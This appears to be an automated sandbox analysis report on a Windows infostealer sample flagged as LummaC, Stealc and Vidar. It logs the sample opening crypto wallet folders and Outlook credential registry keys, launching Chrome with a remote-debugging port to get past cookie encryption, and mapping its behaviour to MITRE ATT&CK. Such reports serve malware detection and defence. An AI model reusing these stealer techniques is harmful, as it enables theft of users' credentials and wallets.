Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Directory queried: C:\Users\user\Documents

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe

Directory queried: number of queries: 3003

Source: Yara match	File source: 00000021.00000003.3779914099.00000000019BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3635881339.000000000180B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3825982133.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3570296328.0000000001804000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3826632372.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3628606604.0000000001805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3779631003.00000000019BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3797636503.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3576014909.0000000001804000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3757488399.00000000019BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3592012775.0000000001806000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3628353430.0000000001804000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3610517200.0000000001804000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3593717445.0000000001804000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.3636048689.0000000001812000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 7864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 5408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 8040, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 7864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 5408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 06d4af6f50.exe PID: 8040, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000003.2174877121.0000000005310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3502627065.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3501473948.0000000000691000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3671582881.0000000000691000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3673961826.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.3612721796.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.3461206243.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2672659024.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deb333ea90.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deb333ea90.exe PID: 5940, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 2232, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840C40 sqlite3_bind_zeroblob,	0_2_6C840C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840D60 sqlite3_bind_parameter_name,	0_2_6C840D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768EA0 sqlite3_clear_bindings,	0_2_6C768EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C840B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C840B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766410 bind,WSAGetLastError,	0_2_6C766410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766070 PR_Listen,	0_2_6C766070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C76C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76C030 sqlite3_bind_parameter_count,	0_2_6C76C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7660B0 listen,WSAGetLastError,	0_2_6C7660B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F22D0 sqlite3_bind_blob,	0_2_6C6F22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7663C0 PR_Bind,	0_2_6C7663C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	2 Bypass User Account Control	21 Deobfuscate/Decode Files or Information	LSASS Memory	22 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	221 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	3 Obfuscated Files or Information	Security Account Manager	258 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	12 Process Injection	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	871 Security Software Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	221 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	361 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	361 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\freebl3.dll	0%	ReversingLabs
